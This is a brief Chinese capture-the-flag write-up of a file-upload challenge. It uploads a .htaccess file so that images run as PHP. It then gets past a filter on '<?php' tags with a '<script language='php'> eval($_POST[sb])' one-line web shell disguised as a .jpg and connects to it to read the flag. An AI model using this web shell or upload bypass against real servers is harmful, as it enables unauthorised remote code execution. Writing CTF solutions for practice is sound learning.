与[MRCTF2020]你传你🐎呢
同样的思路上传.htaccess文件
/var/www/html/upload/43567605b935416b6c6175b4c1e8a3f1/.htaccess succesfully uploaded!
然后上传任意文件的木马即可
然而还是想的太简单
多试几次发现文件后缀名更改全是返回的同样的结果,猜想是文件内容的问题
这样修改后上传成功,估计是对<?php ?>有限制
改为html文件形式上传成功
<script language='php'> eval($_POST[sb]);</script>
pyload:http://00165135-d0b8-4031-a9dc-95f9539cf340.node4.buuoj.cn/upload/43567605b935416b6c6175b4c1e8a3f1/4.jpg
连接成功,找到flag